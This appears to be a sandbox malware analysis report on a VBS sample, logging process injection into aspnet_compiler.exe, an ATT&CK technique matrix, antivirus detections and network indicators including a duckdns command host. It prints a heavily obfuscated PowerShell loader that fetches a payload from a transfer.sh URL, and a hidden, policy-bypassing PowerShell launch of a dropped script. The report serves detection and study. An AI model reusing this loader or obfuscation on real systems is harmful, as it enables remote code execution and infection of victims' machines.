        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 67255Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 67115Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66958Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66802Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66661Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66505Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66365Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66208Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 66052Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65911Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65755Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65615Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65458Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65302Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65161Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 65005Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 64865Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 64708Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 64552Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 64411Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 64255Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 64115Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63958Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63802Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63662Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63505Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63356Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63207Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 63080Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62958Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62800Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62658Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62533Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62415Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62303Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62157Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 62036Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 61895Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 61616Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 61418Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 61263Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 61024Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60907Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60772Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60607Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60434Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60318Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 59504Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 59343Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 59217Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 59092Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 56975Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 56839Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 56654Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 56541Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 56422Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 56300Jump to behavior
        Source: aspnet_compiler.exe, 0000000B.00000002.943104870.00000000014D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
        Source: powershell.exe, 00000002.00000002.953825454.000001EE7C957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8&)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 406000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 408000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 1174008Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts111
        Windows Management Instrumentation
        1
        Registry Run Keys / Startup Folder
        211
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Query Registry
        Remote Services11
        Archive Collected Data
        Exfiltration Over Other Network Medium11
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts21
        Command and Scripting Interpreter
        Boot or Logon Initialization Scripts1
        Registry Run Keys / Startup Folder
        1
        Disable or Modify Tools
        LSASS Memory11
        Security Software Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Non-Standard Port
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts121
        Scripting
        Logon Script (Windows)Logon Script (Windows)21
        Virtualization/Sandbox Evasion
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Ingress Tool Transfer
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts2
        PowerShell
        Logon Script (Mac)Logon Script (Mac)211
        Process Injection
        NTDS21
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput CaptureScheduled Transfer2
        Non-Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
        Deobfuscate/Decode Files or Information
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingData Transfer Size Limits23
        Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common121
        Scripting
        Cached Domain Credentials1
        Remote System Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSync13
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Software Packing
        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        YBAXAKQXVYWIXQJDE.VBS0%VirustotalBrowse
        YBAXAKQXVYWIXQJDE.VBS0%ReversingLabs
        No Antivirus matches
        SourceDetectionScannerLabelLinkDownload
        11.0.aspnet_compiler.exe.400000.4.unpack100%AviraHEUR/AGEN.1202858Download File
        11.2.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1202858Download File
        11.0.aspnet_compiler.exe.400000.2.unpack100%AviraHEUR/AGEN.1202858Download File
        11.0.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1202858Download File
        11.0.aspnet_compiler.exe.400000.3.unpack100%AviraHEUR/AGEN.1202858Download File
        11.0.aspnet_compiler.exe.400000.1.unpack100%AviraHEUR/AGEN.1202858Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        nyanwmoney.duckdns.org0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://crl.microsof0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.microsoft.A0%Avira URL Cloudsafe
        http://crl.m&0%Avira URL Cloudsafe
        https://www.vign.0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        nyanwmoney.duckdns.org
        37.120.141.190
        truetrue
          unknown
          transfer.sh
          144.76.136.153
          truefalse
            high
            store-images.s-microsoft.com
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              nyanwmoney.duckdns.orgtrue
              • Avira URL Cloud: safe
              unknown
              https://transfer.sh/get/8J0O0I/Server435.txtfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://transfer.sh/get/8J0O0I/Server435.wscript.exe, 00000000.00000003.424203468.000002D26132C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.427392004.000002D261330000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://transfer.shpowershell.exe, 00000002.00000002.951646438.000001EE654C3000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.microsofpowershell.exe, 00000002.00000003.439498717.000001EE7C958000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439275078.000001EE7C92B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439437787.000001EE7C945000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://go.micropowershell.exe, 00000002.00000002.951940043.000001EE655DC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://transfer.shpowershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951619061.000001EE654B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.microsoft.Apowershell.exe, 0000000A.00000002.949377445.000001A6589CB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
